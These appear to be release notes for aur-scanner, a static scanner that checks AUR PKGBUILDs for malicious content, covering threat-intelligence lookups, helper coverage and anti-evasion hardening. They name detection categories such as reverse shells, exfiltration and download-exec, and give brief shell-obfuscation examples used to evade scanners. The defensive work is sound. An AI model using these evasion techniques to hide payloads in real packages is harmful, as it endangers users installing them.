aur-scanner 2.0.0

Major release: optional, opt-in threat-intelligence lookups (VirusTotal +
URLhaus), an active verdict cache, broader AUR-helper coverage (cache discovery

• shell wrappers + a Nushell integration), and a global --no-color flag. The
  default scan is unchanged — fully offline and static; threat intelligence stays
  off until you enable it and supply your own keys.

Added — opt-in threat intelligence

• VirusTotal & URLhaus lookups, wired in for real. The previously inert
  provider stubs are now working: with enable_threat_intel set and a key
  supplied (config or VT_API_KEY/VIRUSTOTAL_API_KEY/URLHAUS_AUTH_KEY), a new
  networked analyzer checks each declared sha256sums against VirusTotal and each
  source= URL against abuse.ch/URLhaus, emitting TI-VT-001 / TI-URLHAUS-001
  on a malicious verdict. Off by default — a default scan stays fully
  offline/static. Only data already public in the PKGBUILD (hashes, source URLs)
  is ever transmitted; every lookup fails open so a provider outage never blocks a
  scan. All third-party network code is isolated in a single auditable file
  (threat_intel/remote.rs). URLhaus requires the now-mandatory abuse.ch
  Auth-Key.

  The VirusTotal-by-hash approach is credited to @SuitablyMysterious, whose
  vt_lookup in PR #9
  was the reference implementation.

• Verdict caching is now active. The hardened, MAC-authenticated DiskCache
  (owner-only dir, per-user keyed integrity) — previously built but unwired — now
  caches threat-intel verdicts, so repeat lookups respect VirusTotal's 4-req/min
  public quota. Gated by CacheConfig; lookups are also capped per scan.

Added — broader AUR helper coverage

• system audit and the pacman hook now cover every maintained AUR helper.
  Cache discovery spans yay, paru, pikaur, aura, pakku, trizen, aurutils, rua, and
  pat-aur — at each helper's real PKGBUILD location (e.g. pikaur's
  ~/.local/share/pikaur/aur_repos, rua's ~/.config/rua/pkg, trizen's
  ~/.cache/trizen/sources), with XDG *_HOME overrides honored.
• Shell integration wraps more helpers (#6; diagnosis from @nikoraasu in #12).
  pikaur, trizen, and pakku join paru/yay as pre-build gates (they share
  pacman's -S/-Syu grammar); helpers with a different model (aura -A, and the
  subcommand tools aurutils/rua/pat-aur) are covered by the pacman hook instead.
• Nushell integration (install/integration.nu, #5) — routes
  helper installs through the aur-scan-wrap gate; honors AUR_SCAN_ENABLED=0 and
  provides <helper>-unsafe bypasses. Verified on nushell 0.113.
• pacman hook now sets NeedsTargets, so the transaction's package names reach
  the hook (it reads targets from stdin to locate each PKGBUILD).

Changed

• Added a global --no-color flag; colored output also honors the NO_COLOR
  environment variable and auto-disables when not writing to a terminal.

---

Install

# stable
git clone https://aur.archlinux.org/aur-scanner.git && cd aur-scanner && makepkg -si

Docs: https://aur-scanner.kief.studio · the source tag is GPG-signed (key 25631EAE3F43999050B7D7021132BF893C33FB51).

v1.2.0-rc1 — opt-in threat intelligence (release candidate)

Release candidate — in testing, not for production. A default scan is unchanged: fully offline and static. This RC is published for testing while it bakes.

Added — opt-in threat intelligence

• VirusTotal & URLhaus lookups, wired in. With enable_threat_intel set and a key supplied (config, or VT_API_KEY/VIRUSTOTAL_API_KEY/URLHAUS_AUTH_KEY), a new networked analyzer checks each declared sha256sums against VirusTotal and each source= URL against abuse.ch/URLhaus, emitting TI-VT-001 / TI-URLHAUS-001 on a malicious verdict.
• Off by default. Only data already public in the PKGBUILD (hashes, source URLs) is ever sent; every lookup fails open so a provider outage never blocks a scan. URLhaus requires the now-mandatory abuse.ch Auth-Key.
• All third-party egress is isolated in one auditable file (crates/aur-scanner-core/src/threat_intel/remote.rs) — HTTPS-only, no-redirect, time-bounded.
• Verdict cache activated. The hardened, MAC-authenticated DiskCache now caches lookups (gated by CacheConfig), and lookups are capped per scan, to respect VirusTotal's 4-request/min public quota.

Credit

The VirusTotal-by-hash approach was contributed by @SuitablyMysterious — the vt_lookup in #9 was the reference implementation.

Full notes: see CHANGELOG.md.

v1.1.0 — anti-evasion hardening (stable)

Stable. Promotes the 1.1.0 release-candidate line and folds in a second hardening wave that closes the residual evasion classes from an adversarial self-audit.

Detection — evasion classes closed: variable-indirection taint pass (a fetch/exec hidden behind a shell variable now resolves and flags), case-insensitive structural analyzers, host-aware URL/IOC matching, a supply-chain/packaging-metadata analyzer, and quote-aware printed-message filtering.

Hardening: authenticated cache verdicts (per-user MAC), an allowlisted makepkg build environment, --force can never override an unscannable package, and --local scans only attribute a verdict to a name that provably matches.

Quality: a self-adversarial evasion fuzzer now runs as a release gate — every malicious fixture is mutated through a library of semantics-preserving evasion transforms and the gate must still block each one.

Threat reports that informed this line: #2 (@LunarEclipse363) and #10 (@zebulon2). See CHANGELOG.md for the full entry. Report detection weaknesses privately via a GitHub Security Advisory (SECURITY.md).

v1.1.0-rc3 — pre-ship hardening + exhaustive download-exec sink coverage

Release candidate. Security-hardening release: an adversarial pre-ship review closed six real defects across the gate, parser, and detection layers, plus exhaustive shell/interpreter download-exec coverage (24 shells + 20+ interpreters), EXEC-006 (sqlite3 dot-commands) and EXEC-007 (make from stdin), and quote-aware printed-message filtering. The pacman hook's privilege-drop decision logic is now test-covered.

See CHANGELOG.md for the full [1.1.0-rc3] entry. Detection-weakness reports: please use a private GitHub Security Advisory (SECURITY.md), not a public issue.

aur-scan 1.1.0-rc2 (release candidate)

Proactive detection expansion + anti-evasion.

Install

gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51   # one-time
paru -S aur-scanner-rc                                      # or: yay -S aur-scanner-rc

Highlights

• De-obfuscation engine — decodes ANSI-C quoting ($'\\x63') and adjacent-quote splitting ("b"'u''n'), then runs the whole catalog against the decoded text. The live obfuscated AUR wave (a bun add JS payload hidden in a post_install hook) is now flagged critical, not just a generic high.
• +28 detection rules across reverse shells, exfiltration, auth/system tampering, supply-chain trust, and RCE. Catalog 72 → 106 codes.
• aur-scan install cleans its own build dir (--keep-build to retain).
• Packaging: options=('!debug' '!strip') — no more empty -debug package or gdb/fakeroot noise.

Full notes: CHANGELOG

aur-scan 1.1.0-rc1 (release candidate)

Security-hardening release candidate. Test it before it's promoted to stable.

Install (opt-in RC channel)

gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51   # one-time, if your helper doesn't auto-fetch
paru -S aur-scanner-rc                                      # or: yay -S aur-scanner-rc

aur-scanner-rc builds this GPG-signed tag and conflicts with the stable
aur-scanner — install only one. Production systems should stay on
aur-scanner.

AUR channels

Package	Channel
aur-scanner / ks-aur-scanner	Stable (recommended)
aur-scanner-rc	Release candidate (this build)
aur-scanner-git	Rolling (latest commit)

⚠️ Behavior changes

• Fails closed. The paru/yay wrapper and the pacman hook now deny on a
  scan/fetch error, a timeout, or a non-interactive (no-TTY) prompt instead of
  proceeding. If you drive an AUR helper from scripts/cron/CI, an install that
  can't be fully analyzed is refused rather than silently allowed.
• scan --format json/sarif emit only the machine document on stdout; the
  human summary moved to stderr (so aur-scan scan --format json | jq works).

Security

Input-validation chokepoint for package names/bases, network hardening
(redirects refused, HTTPS-only, size-capped bodies, percent-encoded RPC URLs),
the pacman hook drops root before reading user caches and refuses symlinked
PKGBUILDs, detection-evasion fixes (line-continuation splicing, quote/comment-
aware brace scanning, broadened reverse-shell + crypto-address detection,
checksum SKIP-laundering), and bytes bumped to 1.11.1 (RUSTSEC-2026-0007).

aur-scan 1.0.3

aur-scan 1.0.3

Fixed — false negative in aur-scan check (important)

The check command fetched each AUR package into a temporary directory, then
dropped the handle (deleting the clone) before scanning it. Every fetched
node errored with "IO error: No such file or directory" and the command reported
no findings — so packages with real issues looked clean. This affected the
default gate mode of the shell integration; the race-free install path and
the system audit were not affected.

Reproduced and verified: before the fix, check google-chrome reported clean;
after, it correctly surfaces its HIGH findings.

Thanks to Rafael Lucio (@Disklo) for the report and fix (#4).

Added — fish shell integration

install/integration.fish wraps paru/yay for fish users, matching the
bash/zsh behavior (gate + race-free install mode, scan-fail abort, bypass
shortcuts). Audited against the existing integrations for parity.

Verify

git verify-tag v1.0.3

aur-scan 1.0.2

aur-scan 1.0.2

A correctness and supply-chain-integrity release.

Fixed

• PRIV-002 false positives. The SUID/SGID matcher flagged any 3-digit chmod
  mode whose first digit was 4–7, so benign chmod 755 / chmod 644 /
  install -m644 raised a critical "SUID bit" finding. It now matches only
  true special-bit modes — 4-digit octal (4755, 2755, 6755) or symbolic
  (u+s, g+s, +s) — with regression tests covering both benign and real cases.
• Fixed an environment-fragile rule-count test that failed when a community rule
  was installed in rules.d/.

Changed — supply-chain integrity

• The pinned packages (aur-scanner, ks-aur-scanner) now build from the
  GPG-signed git tag and verify it against our signing key
  (validpgpkeys), instead of hashing a GitHub-generated tarball. makepkg
  refuses to build if the tag signature is missing or forged.
• Import the signing key if your AUR helper does not fetch it automatically:

  gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51
  

Verify this release

git verify-tag v1.0.2

Detection, dependency-tree resolution, SBOM generation, and the race-free
install path are unchanged. The scanner remains static-only — it never executes
the package it inspects.